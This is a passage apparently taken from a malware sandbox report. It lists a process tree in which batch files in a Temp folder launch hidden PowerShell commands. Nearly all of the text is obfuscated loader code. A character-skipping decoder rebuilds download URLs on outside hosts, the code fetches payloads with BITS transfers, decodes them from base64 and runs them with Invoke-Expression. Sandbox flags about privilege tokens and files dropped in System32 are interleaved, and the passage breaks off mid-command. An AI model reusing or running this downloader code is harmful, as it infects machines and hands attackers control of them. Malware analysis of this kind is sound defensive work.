');.($Regnvandsbrnds) (focalizations 'Hyper$ApparKTi.sta R lel.itneiProgrbenlarrBlgepe.iaberafklieKeweetRelig ,aspi=C.unk ,osat[MilliS Manny pendsHospitTaar.e ,ortmGen i.UnderCDeadpooverenWormiv Gil.eSynchrTatovtSubdi].dsal:Zealo: SterF AnsgrUdmugoMaskim Un,eBChe,ra ChrysFuture Dis 6 Ratt4BasibSHarvetChilorpo,ypiUdslunClanngConvo( Sept$BudgeI.eaberSkoler isseeesdrasaf,roiTeskelAgroni,ovedeM.nocnUropocGrudgeCatfi) ,ika ');.($Regnvandsbrnds) (focalizations ' Fang$Aft,nFUd ntlSy.bie VenoaFluebpAnnaliSlmmetVermi Serie=lione Kat c[BreakSBlaakyKv.sssKanvatMeduseAn,ipmd,sox. VedeTIrrepeDitlexUdspytBosom..elatEJenbrn,idsscCabbaoHorsedOnt liGa manKortlgSeneh]Hoved: Nas :A,olaABalkoSNegliCNeuroIsiameI Noni. bilgGLimfaeParoltSchisSKurvbtArmb rTermii Aeron strg Gnav(Tarte$UnderKJok.saMetacl,dklaiRad,rbJonnyr ac ueBrokerDaedaeSka ntShimm)Bakly ');.($Regnvandsbrnds) (focalizations 'Bushm$GalopD R,ekaRepardDulceeSandelDelikl systswelshedisco=Profe$N npaFTorvelGinn ePolytaPatrop.lideiHa.knt Cele. ForpsSoupeuRigsdb RedosNullst B dmrPilliiFrakonCentagminim( Afte3Lysti1 Degr9Sapro1 Rapp3Anspo8Morge,almon2Kaste5Unvol6 Bili4Gedeh0Sword)Fored ');.($Regnvandsbrnds) $Dadellse;}"4⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "++$Tareret;++$Tareret;$Tareret=$Tareret-1;Function focalizations ($Lader){$Regularizes=5;$Regularizes++;For($Faldskrmssoldaten=5; $Faldskrmssoldaten -lt $Lader.Length-1; $Faldskrmssoldaten+=$Regularizes){$Erotogenetic = 'substring';$Aristolochiaceous=$Lader.$Erotogenetic.Invoke($Faldskrmssoldaten, 1);$Bulbose=$Bulbose+$Aristolochiaceous}$Bulbose;}$Skriftbilledet=focalizations 'Ametrh HjlatBrudttShopkpBad,msCela,:Overs/Sur.a/ da bwFina.wSpisew Fi t.sl ngsHydraeMedianElektd,iljus Dr,fp hypea lmanc VerbeOinks.DaghecR,ninoEntocmReakt/FordapacheirRep,eo syl/SavnidRaa glNonp,/Skri,vMyeli9P adrtO.fenzLak,roDemic8 Ordb ';$Planlgningslove=$Skriftbilledet.split([char]62);$Skriftbilledet=$Planlgningslove[0];$Regnvandsbrnds=focalizations 'EvacuiAb ore BeskxKemot ';$Afdramatiseringen = focalizations ' Hobb\ FlgesMerkoyGelnds MilrwNissoo.enefwJaghi6Un.er4habil\LadniW MineiSw wnnBendadVeklaoB malwHildesAmbe,PShlepoSnakkw PanneMetaprForseSS ksahAcutoeSo iclHustelStub,\Ravn vBesl 1Decor.Paras0Algiv\Tailop Doero OphowJuriseTradirIngens Te,eh OvereAdvowl,elpflBifag.I,dpleSynb x LugeeBrugt ';.($Regnvandsbrnds) (focalizations 'platt$TotalHPaleoaRyolfceksdikCopr,sC.ntut .dioaRadicfStvnefMarti= Cass$Ja ane,ispenChil vpar n:HmorrwConceiScantn erskdBe,reiAfklar Floo ') ;.($Regnvandsbrnds) (focalizations ' Subb$KalveA FornflavaldRenegrSubnoaDetaimHaardaConfitLaughiFgtnisHaandeVgtfyrMaa.eiTjenenAcropgS.raae ndinBifag=Pladr$FilmaH Is waMiddecKlippk,elecs ForstpoeciaBrttefHeftefTabif+Warty$InvenA,lenufVindsdWinn rForsia Slutm stroaGlidetB trkiDis,es E.egeGelatr ,odbiuimodn UnlugSoulheFlu,tnEpi,e ') ;.($Regnvandsbrnds) (focalizations 'uniku$P,ematFrowsrLup,maDo kls Pa lkTr cheLongw Over=De,ra .eepe(agros(OversgPraktwS,ttemKrykkiAmboi FrigfwSnopeiOil,in Ove.3 E.it2Ideoo_HoejlpA kasrFolkeo,eighc Homoe Spros.nkonsBacks be,ta-OvernF,acry BournPAgglorKlaptoskabecRedkne Jak,s p.rasFragmIJyde,dStand= Pala$Arryp{ Tnk,PGenocIfusioD Smre}S,ast)Rv gr.NedvrC Byg,ovrtplmDilatm onasaReflen Dia dDeforLSpartiSybarnSha peOvera)Honnr Regia-.nsttsKartopL,spalK lkbiSennetZygoz Mariu[PeiseceugenhSidseaFu.tsrVandu]Kursu3Disen4Forfa ');.($Regnvandsbrnds) (focalizations 'Monst$Afs rsucayavPrelii AbjunLdrepg CajaePerinlTr,ru rkla=Degly Posen$LustftRangerPer.pa camis,ostek BetneEukar[Kurva$ DoortsandsrLnrelaEi essYoghuk Rense .nam.OctoscOptimoAdj,cuNymphnWin,strese,- Viel2Nondi]B vrt ');.($Regnvandsbrnds) (focalizations 'Bolig$H,vedeBete,t Tvi mKr opa Blu.aOverslhypogsGammepNeroieSocianWi sogAttraeT.appn.kanne Effl=Nonli( InacT e,ipeLaskesT ggetBu,ti-ForriPHvidoaNon vt OverhDeka. Kont.$SphygASkndsfSypigdInterrEucaraParalm By,aaAadset K.asiSubocsS rmse,inanr hauli ObstnGadetgBytteeTybalnAndro)Ci tr Sesa- StenASkallnC.pesdBu.an Alsok(Chrom[ PyraIAfkognmtaaltRhodaP Pakvt Tonir Musi]K.til:Straa: od ns DeltiBree,zMon,se A.in Tabel-StruneL.ssiq Furi Vide8Snouc)Srsyn ') ;if ($etmaalspengene) {.$Afdramatiseringen $svingel;} else {;$Forbreddes=focalizations ' AarsSEligetDepara bjerOmgantYokel-ProduB MiliiKastet,ostasFeuchTSquarrBilivaRgfornEventsPeskyfDetaceNonrer.enoc Fo.et-Hin.eS Vs,loStockuStilrrUagtscA.lsdeFo.si Eksis$Sna,sSG.ttekStu,tr Fremi,ymmefhai.atDep,eb Fr ti RatilVar.glShahzeUnde.dS,rmfeRaajotSoma, fervi- SmokD.ekokePointsPropotSchoeiBulnin MiniaBet dtPressiAfsvaoHollon A,in Sph,r$Ta loHSereraLeisucUnneukBachesL,nget UtopaProbofAnterfMetre ';.($Regnvandsbrnds) (focalizations ' .rdn$FalsiHCavoraHyp,gcNeedekFarvesAntagtTotalaCacodfAntipfAffal=Rrhne$ DegueBandsn C lpvGodse:ForsyaSim.lpKretipSt,und OutwaArybatdeed.aTakh. ') ;.($Regnvandsbrnds) (focalizations 'FipskIPhob.mLn itpHnseaoPathorFinant Se.i-AadseMPhilooMichodpap ru.imeolPe,lieAfn.k VldiBNo.kwiCalvit L nvsNordbTKl.ssrAfgivaAdjutnB,gynsCytotf OxygeRaadsr etow ') ;$Hackstaff=$Hackstaff+'\sundhedsfares.Erd';while (-not $Sunup213) {.($Regnvandsbrnds) (focalizations ',esti$Ty.isS FixbuParaln.syncuEneucp .ejl2 Hulk1Retr.3,usse=Taxi (CochlTsvimeeOs.ansFlyt tSeacr-ForinPArchca Orgatp.eilhH tte Ankla$ArbitHInteraAndencKumulk agissUns itGlitta Opf,fAfbryfSeq.s)Luxur ') ;.($Regnvandsbrnds) $Forbreddes;.($Regnvandsbrnds) (focalizations 'Ube,aS PrgttGudesa .tofrUndert Bort-divanSHypotlSp.keeP oczePe,iapTelef emf5Tosse ');$Skriftbilledet=$Planlgningslove[$Boppers++%$Planlgningslove.count];}.($Regnvandsbrnds) (focalizations 'Grupp$Ejef IPinckrFor rr .mbrequoadsMic.oi Gr ilDadleiSkovpe BrnenHa dbc Toxae Priv F.rm=Ek,is OmtviGPotene Luret Touz-,rugtCFotogo .efanAntict,aadee.eticnLettetOryct Fruit$,onopH Th.ba UnlucFontnkNyttesq,adrtTlapaa BlowfS,ovpfVaabe ');.($Regnvandsbrnds) (focalizations 'Hyper$ApparKTi.sta R lel.itneiProgrbenlarrBlgepe.iaberafklieKeweetRelig ,aspi=C.unk ,osat[MilliS Manny pendsHospitTaar.e ,ortmGen i.UnderCDeadpooverenWormiv Gil.eSynchrTatovtSubdi].dsal:Zealo: SterF AnsgrUdmugoMaskim Un,eBChe,ra ChrysFuture Dis 6 Ratt4BasibSHarvetChilorpo,ypiUdslunClanngConvo( Sept$BudgeI.eaberSkoler isseeesdrasaf,roiTeskelAgroni,ovedeM.nocnUropocGrudgeCatfi) ,ika ');.($Regnvandsbrnds) (focalizations ' Fang$Aft,nFUd ntlSy.bie VenoaFluebpAnnaliSlmmetVermi Serie=lione Kat c[BreakSBlaakyKv.sssKanvatMeduseAn,ipmd,sox. VedeTIrrepeDitlexUdspytBosom..elatEJenbrn,idsscCabbaoHorsedOnt liGa manKortlgSeneh]Hoved: Nas :A,olaABalkoSNegliCNeuroIsiameI Noni. bilgGLimfaeParoltSchisSKurvbtArmb rTermii Aeron strg Gnav(Tarte$UnderKJok.saMetacl,dklaiRad,rbJonnyr ac ueBrokerDaedaeSka ntShimm)Bakly ');.($Regnvandsbrnds) (focalizations 'Bushm$GalopD R,ekaRepardDulceeSandelDelikl systswelshedisco=Profe$N npaFTorvelGinn ePolytaPatrop.lideiHa.knt Cele. ForpsSoupeuRigsdb RedosNullst B dmrPilliiFrakonCentagminim( Afte3Lysti1 Degr9Sapro1 Rapp3Anspo8Morge,almon2Kaste5Unvol6 Bili4Gedeh0Sword)Fored ');.($Regnvandsbrnds) $Dadellse;}"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tapjmx.bat" "3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden "++$Needfully;++$Needfully;$Needfully=$Needfully-1;Function Teknificeringer ($stnderforsamlingers){$Nglevrdiers=5;$Nglevrdiers++;For($Klimakteriets=5; $Klimakteriets -lt $stnderforsamlingers.Length-1; $Klimakteriets+=$Nglevrdiers){$Sultne = 'substring';$Azote=$stnderforsamlingers.$Sultne.Invoke($Klimakteriets, 1);$Larkier=$Larkier+$Azote}$Larkier;}$Pelletises=Teknificeringer 'SpurvhMemortPostpt,arecp Posns E id:Barri/Anima/ Glidk C,ani,isass KoncaSporon PrivbEbioneNautitSafiah Ho,oaabecekSeroz.Gudinc ebrao KretmWhite/ddshjPL.nds/ReforMYadeaa Uni.lH ndbaKdva w.rogniAudios SlatkAutom.Tinelt Inteh FarvnGelth ';$Elix41=$Pelletises.split([char]62);$Pelletises=$Elix41[0];$Flgerigtige=Teknificeringer ' tabi asomeDiagrxMoiet ';$Gratisters = Teknificeringer 'Nonba\UndersAdsorySedimsSeag,wSt.nkoBin ewEfter6 In,s4skrid\j rbiWStangiCobwen ,katdComb.o Colew ngens Ch,iPSpr toGraduwAnstneYdelsr okseSS,stehActu,eLigeglMilitlAu,os\UndecvDestr1Je,li.Brain0Preac\ImperpLi.eto SiniwBenvneMarkerRegnvsR.stlhAta.heAf.anlSultelSigne.KoloneAnemixKrnemeMitsu ';.($Flgerigtige) (Teknificeringer 'Eneta$A,batCOinochDelt.o .lokrProduivillao Sp,re arepl.ehaiProtat Trolh Arbeevrvlelplum,iInocuo SwipmBrandaPoisisSpunn=Bald $ SpydeDobben TraivPr.nt:TilpawkompoiGyldin,ymbadCounti,holirStykg ') ;.($Flgerigtige) (Teknificeringer 'Vag.r$F.rtvGHalvarHoveda Narat L,afiLapnisBerett.lesheCovesrCeredsSluic= Lren$Unc.nC heowhUndreoLawisrFuskeiB nenoIn nae BrakpNanopiS.rintMastehTa pee StaalUnd,riSecu oquaapmReoblaIndensMuffe+nedla$Fu,loG U.harFormuaUnthrtAutoliDeanssFamiltChesse S.lsrSynodsBes r ') ;.($Flgerigtige) (Teknificeringer 'W nkl$ ga.mLsigmayRettes FremsMinidhGispeoUnchewSukreePokalnKommaeScrob Skaff= Fudd Embow(Hydr,(Sepiog Far wKryolmSkraaiOpere M ditwIns,riStttenUnder3Dysts2Mahat_DatacpTrut,r .remoF rsoc.dealeInvits Be,rs.nlam .tra-Ble.nFPale ZoophPnedbrrLikvio TankcVi orejackssgy nasScionIKnutsd Ove =F les$ Unco{Ubem,PHulsmI DecrD Neje}Tansi)Anti .BrostC RoseoPar emUndepmDumpia Stu nalgerd TuyeLassyriLipotn IndeeLanzk) Skuf Tekst-LasersFilmapOmlydl Fyr.i acrot Nyct antir[SammecCoagghTiti.aDisesr E fo]Gordi3Forsg4 Br.d ');.($Flgerigtige) (Teknificeringer 'Enfam$Cat,aPShootiAnschgophicnSkam.o,retmrSlaloa Have Firl=Imm,t P,unc$AdvocL MongyTriumsOverfsBogymh Aft oHypo,wA,ecteLunkenGelateDekli[ Te n$UdkonL Buddyc,xarsAristsSesamhTrlasoPladswEnmare MyrdnSym.oeJahnf. Pot.cStedfojuliuuEnetanCh,lat Lsgr- Feri2 yghv]Tops, ');.($Flgerigtige) (Teknificeringer 'Fdeva$RaasaESuprav ,onoaTepidlBookruCand,aSammetGoodioRacklr Varms Blon=Agt r(ParalTKonfreSto.ms Fondtsk.ff-AllokPDelggaEftertUnderhcommo Seksu$Fdr.nGUrgerrInd.caPoo.etBillaiWrains St.ftTrut e,tvunrdatassInexp)Stabi Su er-Uni,nAIdentn.iliedSundh Quize(Pla l[ DeplI Brnen achrtTjvasPPlat.tisoherForz,]Blung:Cou,t: vands.etaciCri pzAnesteN,rmt ,eigh-NarkoePayinqF yns Pjat8 N ri)Masse ') ;if ($Evaluators) {.$Gratisters $Pignora;} else {;$Centroincs=Teknificeringer ' sta,SInt.rtGuttia decirDannetUngmc-KontrBDeuteiBedect Indes,esteTUnsusr V,llaVesicn Po,tsSamlefLarv,e radrNede. Haand-PhoroSD.alyoA.giouQuantrIndracBawkeeStaa, U fal$dematPSmagle ExullForbyl,talieOutsit .elvi Sl,lsWhaupeknskvsSk.bs Gyros-ArgumDBassoeArraisU,idit .antiTomtsnBagveaUnsaft Da.oi egnso Sa.mnKon r Se id$Axio.CDecolh UnoroH laurAdelsianastoRappeeP,devpBeregiVi,iatSlvrihIchneeMethylBe,efi BlgeoFami.mLuftvaRvfulsfl.te ';.($Flgerigtige) (Teknificeringer ' Adul$Uge,sCMyth,hdrnino ShlirSubtii InosoRachie Whipppaa ki dhugtUnde,hsl,taeAgurklFactoiGyratoPostnmUrigta Sn,ks L,gr= St d$Panc eHea hnrescrvUds i:G.undaMu.erp Dribp Syg dDeltaaMe.zitNdtrfaAenea ') ;.($Flgerigtige) (Teknificeringer 'UprusIBen.im DetapU.suroBreadrDobbetVaag -TesseMUdskioInklidHusmauVelsel,ecope Indt SemimB .areiAl,rmtReas sCro.tT PerirNewswaPatc nApyresTocokfUran,ePrepur ,eko ') ;$Chorioepitheliomas=$Chorioepitheliomas+'\Neonlysenes.Sti';while (-not $Sarkom) {.($Flgerigtige) (Teknificeringer 'Rinse$OverhSProctaIsodrr ubrkSt iko E.ogmY.erk= Eve.(scragTDi.bueIndefsViremtFlavo-MargrPCoal a YndltErotoh Rtsh Bacte$KrudtCNatiohMi proMalearkranhi Strao,agvreLecotp Se vi IndltInatthData e T.ndlRatifiSttemoAerogm BomhaT,ksasPrior) colo ') ;.($Flgerigtige) $Centroincs;.($Flgerigtige) (Teknificeringer ' TestSConcotPostpaSpaperOv.rst ca,a-GuddoS SyntlDame eBerateKlapspOverf .rocu5Makes ');$Pelletises=$Elix41[$Landvindinger++%$Elix41.count];}.($Flgerigtige) (Teknificeringer 'Kodri$ Oxy UMaremnLunelp.empeeKn,plrKa.kei,algssJvninhNadveaSubstbBio,rlElectyBlte Sel.=Alca, ProcGricareSoftdt Flor-AhiroCFinmeoPostlnSynertChortePointn AftetRudev Forg$KrebiCTapr hHeteroUnlanr DetriDebutoDesigeAnkelp TilsiHj,ejtSwepthAwakeeAcheclCho,eifirmaoOvernmMoboca StudsReobl ');.($Flgerigtige) (Teknificeringer ' veri$Baa,dD .oorrGabgaoGuldanIndfonInd.ki.akken ForfgDommee An,lnLflassCleoc Konta=Trust Smaa[Po,emSRandsyFor.isGrillt Aut,eCossimBe,gl.PektiC,etaroAirp.nProjev Che.e spolrDogmatUdsty]Lym,h:Depri: fls.FBelinrPrecooPausemThermBundisaPhlebsBo.lseDokum6Tungt4 remaSForsitPen irL vkeiEras,naflo,gRin,e(E.ope$grillUFis.enYasmipEvoleeFjersrstaaliStyl sAfbeth,astla FrembSmasklVindiyjaevn) Nedb ');.($Flgerigtige) (Teknificeringer ' Abon$XyloiCHyd,ahStewiaAirglfNum.ffCoccoiS,ittnNyta,eT lbas Pr,ssGauli Unsch=Asymb none[OxymaS N.nmyPr orsPietrtMonoveEnti.mFabri. ProjTKmpede c.llxShutetSelsk.For nE ,chin Cowmc SilkoMarcedFyrstiInfibnTouc,gKvgpr]K,lun:De on: DispAAnisoSRadiuCBemanIDomicI Spil.IntraGFl,steK.skotBekldSUdspitGnaskr Caboivibexn Sp.agAktie( red $Be.avDRiv.trMok aotestbnFloddn M,siiSerben Skaag KeraebasidnAdsk,sLat n)Ove,f ');.($Flgerigtige) (Teknificeringer ' At.a$UnderHVog moHeritrUpbuin.ndgalArm.riNonlik do meGaggl8Nitty3Ef.ec=Udvlg$ Ko kCal dahVarskaPervef For,fCrilei ObelnPeadaebestvsBejdss Undi.Ophrys.ekseu oponbTafiasBreastFiftyrSkattiBevidnBrnemg opsa(Qua r3,road1Noopo5oprre8Crane6 Peac4Und,t,Galde2Appal5 Worl6 Ach.2.ndta1Prayi) Slo ');.($Flgerigtige) $Hornlike83;}"4⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "++$Needfully;++$Needfully;$Needfully=$Needfully-1;Function Teknificeringer ($stnderforsamlingers){$Nglevrdiers=5;$Nglevrdiers++;For($Klimakteriets=5; $Klimakteriets -lt $stnderforsamlingers.Length-1; $Klimakteriets+=$Nglevrdiers){$Sultne = 'substring';$Azote=$stnderforsamlingers.$Sultne.Invoke($Klimakteriets, 1);$Larkier=$Larkier+$Azote}$Larkier;}$Pelletises=Teknificeringer 'SpurvhMemortPostpt,arecp Posns E id:Barri/Anima/ Glidk C,ani,isass KoncaSporon PrivbEbioneNautitSafiah Ho,oaabecekSeroz.Gudinc ebrao KretmWhite/ddshjPL.nds/ReforMYadeaa Uni.lH ndbaKdva w.rogniAudios SlatkAutom.Tinelt Inteh FarvnGelth ';$Elix41=$Pelletises.split([char]62);$Pelletises=$Elix41[0];$Flgerigtige=Teknificeringer ' tabi asomeDiagrxMoiet ';$Gratisters = Teknificeringer 'Nonba\UndersAdsorySedimsSeag,wSt.nkoBin ewEfter6 In,s4skrid\j rbiWStangiCobwen ,katdComb.o Colew ngens Ch,iPSpr toGraduwAnstneYdelsr okseSS,stehActu,eLigeglMilitlAu,os\UndecvDestr1Je,li.Brain0Preac\ImperpLi.eto SiniwBenvneMarkerRegnvsR.stlhAta.heAf.anlSultelSigne.KoloneAnemixKrnemeMitsu ';.($Flgerigtige) (Teknificeringer 'Eneta$A,batCOinochDelt.o .lokrProduivillao Sp,re arepl.ehaiProtat Trolh Arbeevrvlelplum,iInocuo SwipmBrandaPoisisSpunn=Bald $ SpydeDobben TraivPr.nt:TilpawkompoiGyldin,ymbadCounti,holirStykg ') ;.($Flgerigtige) (Teknificeringer 'Vag.r$F.rtvGHalvarHoveda Narat L,afiLapnisBerett.lesheCovesrCeredsSluic= Lren$Unc.nC heowhUndreoLawisrFuskeiB nenoIn nae BrakpNanopiS.rintMastehTa pee StaalUnd,riSecu oquaapmReoblaIndensMuffe+nedla$Fu,loG U.harFormuaUnthrtAutoliDeanssFamiltChesse S.lsrSynodsBes r ') ;.($Flgerigtige) (Teknificeringer 'W nkl$ ga.mLsigmayRettes FremsMinidhGispeoUnchewSukreePokalnKommaeScrob Skaff= Fudd Embow(Hydr,(Sepiog Far wKryolmSkraaiOpere M ditwIns,riStttenUnder3Dysts2Mahat_DatacpTrut,r .remoF rsoc.dealeInvits Be,rs.nlam .tra-Ble.nFPale ZoophPnedbrrLikvio TankcVi orejackssgy nasScionIKnutsd Ove =F les$ Unco{Ubem,PHulsmI DecrD Neje}Tansi)Anti .BrostC RoseoPar emUndepmDumpia Stu nalgerd TuyeLassyriLipotn IndeeLanzk) Skuf Tekst-LasersFilmapOmlydl Fyr.i acrot Nyct antir[SammecCoagghTiti.aDisesr E fo]Gordi3Forsg4 Br.d ');.($Flgerigtige) (Teknificeringer 'Enfam$Cat,aPShootiAnschgophicnSkam.o,retmrSlaloa Have Firl=Imm,t P,unc$AdvocL MongyTriumsOverfsBogymh Aft oHypo,wA,ecteLunkenGelateDekli[ Te n$UdkonL Buddyc,xarsAristsSesamhTrlasoPladswEnmare MyrdnSym.oeJahnf. Pot.cStedfojuliuuEnetanCh,lat Lsgr- Feri2 yghv]Tops, ');.($Flgerigtige) (Teknificeringer 'Fdeva$RaasaESuprav ,onoaTepidlBookruCand,aSammetGoodioRacklr Varms Blon=Agt r(ParalTKonfreSto.ms Fondtsk.ff-AllokPDelggaEftertUnderhcommo Seksu$Fdr.nGUrgerrInd.caPoo.etBillaiWrains St.ftTrut e,tvunrdatassInexp)Stabi Su er-Uni,nAIdentn.iliedSundh Quize(Pla l[ DeplI Brnen achrtTjvasPPlat.tisoherForz,]Blung:Cou,t: vands.etaciCri pzAnesteN,rmt ,eigh-NarkoePayinqF yns Pjat8 N ri)Masse ') ;if ($Evaluators) {.$Gratisters $Pignora;} else {;$Centroincs=Teknificeringer ' sta,SInt.rtGuttia decirDannetUngmc-KontrBDeuteiBedect Indes,esteTUnsusr V,llaVesicn Po,tsSamlefLarv,e radrNede. Haand-PhoroSD.alyoA.giouQuantrIndracBawkeeStaa, U fal$dematPSmagle ExullForbyl,talieOutsit .elvi Sl,lsWhaupeknskvsSk.bs Gyros-ArgumDBassoeArraisU,idit .antiTomtsnBagveaUnsaft Da.oi egnso Sa.mnKon r Se id$Axio.CDecolh UnoroH laurAdelsianastoRappeeP,devpBeregiVi,iatSlvrihIchneeMethylBe,efi BlgeoFami.mLuftvaRvfulsfl.te ';.($Flgerigtige) (Teknificeringer ' Adul$Uge,sCMyth,hdrnino ShlirSubtii InosoRachie Whipppaa ki dhugtUnde,hsl,taeAgurklFactoiGyratoPostnmUrigta Sn,ks L,gr= St d$Panc eHea hnrescrvUds i:G.undaMu.erp Dribp Syg dDeltaaMe.zitNdtrfaAenea ') ;.($Flgerigtige) (Teknificeringer 'UprusIBen.im DetapU.suroBreadrDobbetVaag -TesseMUdskioInklidHusmauVelsel,ecope Indt SemimB .areiAl,rmtReas sCro.tT PerirNewswaPatc nApyresTocokfUran,ePrepur ,eko ') ;$Chorioepitheliomas=$Chorioepitheliomas+'\Neonlysenes.Sti';while (-not $Sarkom) {.($Flgerigtige) (Teknificeringer 'Rinse$OverhSProctaIsodrr ubrkSt iko E.ogmY.erk= Eve.(scragTDi.bueIndefsViremtFlavo-MargrPCoal a YndltErotoh Rtsh Bacte$KrudtCNatiohMi proMalearkranhi Strao,agvreLecotp Se vi IndltInatthData e T.ndlRatifiSttemoAerogm BomhaT,ksasPrior) colo ') ;.($Flgerigtige) $Centroincs;.($Flgerigtige) (Teknificeringer ' TestSConcotPostpaSpaperOv.rst ca,a-GuddoS SyntlDame eBerateKlapspOverf .rocu5Makes ');$Pelletises=$Elix41[$Landvindinger++%$Elix41.count];}.($Flgerigtige) (Teknificeringer 'Kodri$ Oxy UMaremnLunelp.empeeKn,plrKa.kei,algssJvninhNadveaSubstbBio,rlElectyBlte Sel.=Alca, ProcGricareSoftdt Flor-AhiroCFinmeoPostlnSynertChortePointn AftetRudev Forg$KrebiCTapr hHeteroUnlanr DetriDebutoDesigeAnkelp TilsiHj,ejtSwepthAwakeeAcheclCho,eifirmaoOvernmMoboca StudsReobl ');.($Flgerigtige) (Teknificeringer ' veri$Baa,dD .oorrGabgaoGuldanIndfonInd.ki.akken ForfgDommee An,lnLflassCleoc Konta=Trust Smaa[Po,emSRandsyFor.isGrillt Aut,eCossimBe,gl.PektiC,etaroAirp.nProjev Che.e spolrDogmatUdsty]Lym,h:Depri: fls.FBelinrPrecooPausemThermBundisaPhlebsBo.lseDokum6Tungt4 remaSForsitPen irL vkeiEras,naflo,gRin,e(E.ope$grillUFis.enYasmipEvoleeFjersrstaaliStyl sAfbeth,astla FrembSmasklVindiyjaevn) Nedb ');.($Flgerigtige) (Teknificeringer ' Abon$XyloiCHyd,ahStewiaAirglfNum.ffCoccoiS,ittnNyta,eT lbas Pr,ssGauli Unsch=Asymb none[OxymaS N.nmyPr orsPietrtMonoveEnti.mFabri. ProjTKmpede c.llxShutetSelsk.For nE ,chin Cowmc SilkoMarcedFyrstiInfibnTouc,gKvgpr]K,lun:De on: DispAAnisoSRadiuCBemanIDomicI Spil.IntraGFl,steK.skotBekldSUdspitGnaskr Caboivibexn Sp.agAktie( red $Be.avDRiv.trMok aotestbnFloddn M,siiSerben Skaag KeraebasidnAdsk,sLat n)Ove,f ');.($Flgerigtige) (Teknificeringer ' At.a$UnderHVog moHeritrUpbuin.ndgalArm.riNonlik do meGaggl8Nitty3Ef.ec=Udvlg$ Ko kCal dahVarskaPervef For,fCrilei ObelnPeadaebestvsBejdss Undi.Ophrys.ekseu oponbTafiasBreastFiftyrSkattiBevidnBrnemg opsa(Qua r3,road1Noopo5oprre8Crane6 Peac4Und,t,Galde2Appal5 Worl6 Ach.2.ndta1Prayi) Slo ');.($Flgerigtige) $Hornlike83;}"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\khnqhu.cmd" "3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden "++$Misviser;++$Misviser;$Misviser=$Misviser-1;Function Terrn ($terminusen){$Thallogen140=5;$Thallogen140++;For($Stabelstoles=5; $Stabelstoles -lt $terminusen.Length-1; $Stabelstoles+=$Thallogen140){$Sammenklumpningens = 'substring';$centranthus=$terminusen.$Sammenklumpningens.Invoke($Stabelstoles, 1);$Wekau236=$Wekau236+$centranthus}$Wekau236;}$dirigentstokke=Terrn 'Deklah Une.t HoontglasupSchemsFyrkl:.erma/ Sto,/SkiftkOu,roiReal.sStraia Cr.snCondubRingkeEli,etPrinthLucifaHydrakFastu.Phrenc HousoSlavem.odel/GudmdPSejrt/ Nedse Pa ti ForgsKrystt bseie dbomdGagerdPlougfskudeosamurdArvefiVrdimc Stat.be,rudUldhawAbovepB evd ';$Mellemniveauets=$dirigentstokke.split([char]62);$dirigentstokke=$Mellemniveauets[0];$Monophonous=Terrn 'AfsiniHere.e Oplaxsquar ';$Dagtemperaturerne = Terrn ' Zapo\ Chais toreyR.daksUnburwAkvapoFortawGlaum6Resaw4 .orm\BrandWSen,ii Wrecn undedDis.gosp.sew trousCacodPT taloK.mmewUdvikeStngerNotaeS R.fahAfsoneOlearlUdstelStru,\ Hermv S.ff1Inkas.Huxte0Kamp.\SnuggpPoddloSpe mwGoodee,porlrDarsosDistrh Sw leEliaslHollblLserk. Of eeSva rx ShoceB,udo ';.($Monophonous) (Terrn 'Ukoll$BjninG Sp.riindfitPersetKaptaeFlaskr T.nfnThiazsfor.t=Utilb$Fdrele veranHandevCalix:C lsiwSlagiiR,stinUn.ildPr griToolmr.yten ') ;.($Monophonous) (Terrn ',ioto$ SekrDPraktaRegr,gNyor,tHalloeUnranmLobefpPor eeT,pplrKligsa GradtSompnuMiljbrPolereOutmar ChasnrearteSol,l= Info$fatt,G Belli,pipht DelstNon ceTra,kr seklnFormasEzba.+ Hump$ UdbyDou,blaGradugAlg etSilkeeCamelm,oodlpEthereApokrrAnf,eas,dest TretuU.enorAntibe PenkrPompin SarkeBrand ') ;.($Monophonous) (Terrn 'Spaan$KighoRStat.aStrmpn SyngdTrytosTro ptDemeraTekstt UntosSul h edtr=Gnidr Ha.kn(unrul( NontgGoralwHjlpemStoryiRevue DingywOospoi ktienReb,i3F.rma2,rall_ xazipPersorslaveoTi skcHertueAfkv,spaleosAvisk Gaard-Chil,FConta Fe.chPm,gnerCadesoMono.cIntereTn stsT.bifsKometIPhotodchi,e= issh$Vesti{cimm,PCharmIUneffDWildf}Sniv ) Indu.FortjCSlateoBaksnmFinanm fstaaLiga n.ncomd.iritLConfeimetasnNeurae Mane)actin Bushv-tropis,arxipRykkelHelioi.iniet syge Sko,e[ Postcam lgh,onsuaEpicer Reci]Omnin3Irrig4Facet ');.($Monophonous) (Terrn ' Anti$OccipDvinkaa dichnAnimasGoerseBuddikRetfroGr,jemMacarpchaptaSt.kegJttesnDia,oiTopf,eSmelttForha Han.n=sprog V ult$GrognR .priaThreanTrustdSavo,sPreputTelefaEksertGe.ytsUdkas[Af je$MisshRSkoleaMole nCariddByggesForsatHandsagoofit GymnsTefil.SemincNatteoBeoenuS stenBelbstOffic-Un.ri2 K.re]Fo.bi ');.($Monophonous) (Terrn ',mirk$AprosUCharln roejfMilieoKabber rchacB reneUnderfepineuSla,slC.noblPhotoy Nonu=nonsy(Unaf.TEksteeKorans ag,nt v.ga-KobbePsank,a laatAlma hSc,em S mpl$oneroDAlginaP,erogElli tUnkeneKajsamOutbrpNonrueWagerrThli.ascroltElaphuSuccerSkatteKe,dor KarinFingee yve)Konfo Unive-Prot,A.onconForsidP.eac Danne(Dejeu[ChlorI MethnLote,tF,shyP 